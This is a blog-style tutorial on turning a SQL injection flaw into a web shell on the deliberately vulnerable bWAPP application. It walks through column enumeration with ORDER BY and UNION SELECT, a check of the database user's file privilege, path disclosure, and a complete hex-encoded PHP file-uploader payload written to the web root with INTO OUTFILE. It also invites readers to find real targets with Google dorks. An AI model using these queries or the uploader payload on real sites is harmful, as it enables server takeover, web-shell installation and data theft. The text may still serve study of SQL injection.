Shell upload using SQL Injection

Every time we hear SQL injection, Database Dumping or admin panel access are the common things which comes to our mind. But there is more to that which we can achieve by taking advantage of SQL Injection like Shell Upload, gaining server access, executing remote process...etc.

You are reading this post means you already have a target that is vulnerable to SQL Injection or you can find one using Google dorks.For demo purpose we will be using BWAPP application(open source vulnerable application).

NOTE: This is Strictly for educational purpose only!

To Upload a Shell, below are the two requirements

  1. A sql injection vulnerable point
  2. Account which has privilege to create files in server.
Let's begin to exploit the SQLi vulnerability to upload shell.

  • My target URL is http://localhost/bwapp/sqli_2.php?movie

  • Now we have to know the number of columns of the current table. That we can achieve using order by.
  • Let’s try with http://localhost/bwapp/sqli_2.php?movie=1 order by 10 We get an Error message.
  • Let’s try with http://localhost/bwapp/sqli_2.php?movie=8 order by 7. We are able to retrieve the data table.

  •    Let’s try with http://localhost/bwapp/sqli_2.php?movie=8 order by 8. We get an Error message . So it confirms that table has 7 columns.
  • Now we have to determine the vulnerable columns. In order to do that we will take help of the union select query. That can be done using http://localhost/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,2,3,4,5,6,7

  • Now we get that column 2,3,4,5 are vulnerable. (You can see output point in front end).
  • Next we have to determine the current user. This can be done using http://localhost/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,user,3,4,5,6,7 from MySQL. User
             http://localhost/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,user(),3,4,5,6,7
    • So we get that the user is root.
    • Lets check the privilege of the current user (root), because for uploading any file to the server the user must have the privilege.This can be easily done using http://localhost/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,group_concat(user,0x3a,file_priv),3,4,5,6,7 from mysql.user

    • So now we get to know that the root user has the privilege to create file on the server.
    Note: If that is not the case for your user then you have to access the admin cred by dumping the tables.
    • Now we have to determine the path where we can upload the shell.That can be done using http://localhost/bwapp/sqli_2.php?movie[]=1
    • So we get to know that we can upload our shell in C:\xampp\htdocs\bWAPP\ directory
    • Now this is the Final stage. We have to upload a php uploader which will help us in uploading shell in later stage.The "uploader php script" below is the code.

    • The script has to be hex encoded and prefix 0x to make the system understand that this a hex code.
    •    The final payload will be like 0x3c3f706870206563686f202755706c6f616465723c62723e273b6563686f20273c62723e273b6563686f20273c666f726d20616374696f6e3d2222206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d6461746122206e616d653d2275706c6f61646572222069643d2275706c6f61646572223e273b6563686f20273c696e70757420747970653d2266696c6522206e616d653d2266696c65222073697a653d223530223e3c696e707574206e616d653d225f75706c2220747970653d227375626d6974222069643d225f75706c222076616c75653d2255706c6f6164223e3c2f666f726d3e273b69662820245f504f53545b275f75706c275d203d3d202255706c6f6164222029207b69662840636f707928245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f46494c45535b2766696c65275d5b276e616d65275d2929207b206563686f20273c623e55706c6f6164205375636365737346756c2121213c2f623e3c62723e3c62723e273b207d656c7365207b206563686f20273c623e55706c6f6164204e4f7420446f6e652121213c2f623e3c62723e3c62723e273b207d7d3f3e
    • And the final query will be
     http://localhost/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,0x3c3f706870206563686f202755706c6f616465723c62723e273b6563686f20273c62723e273b6563686f20273c666f726d20616374696f6e3d2222206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d6461746122206e616d653d2275706c6f61646572222069643d2275706c6f61646572223e273b6563686f20273c696e70757420747970653d2266696c6522206e616d653d2266696c65222073697a653d223530223e3c696e707574206e616d653d225f75706c2220747970653d227375626d6974222069643d225f75706c222076616c75653d2255706c6f6164223e3c2f666f726d3e273b69662820245f504f53545b275f75706c275d203d3d202255706c6f6164222029207b69662840636f707928245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f46494c45535b2766696c65275d5b276e616d65275d2929207b206563686f20273c623e55706c6f6164205375636365737346756c2121213c2f623e3c62723e3c62723e273b207d656c7365207b206563686f20273c623e55706c6f6164204e4f7420446f6e652121213c2f623e3c62723e3c62723e273b207d7d3f3e,3,4,5,6,7 INTO OUTFILE "C:\\xampp\\htdocs\\bWAPP\\uploader.php"--+&action=go

    • You can access the uploader by visiting http://localhost/bwapp/uploader.php.

    • Now using the uploader we can upload any shell.

    Feel Free to Comment if you like the tutorial also you can ask your query in below box if you are stuck at any point.

    Thanks for your time.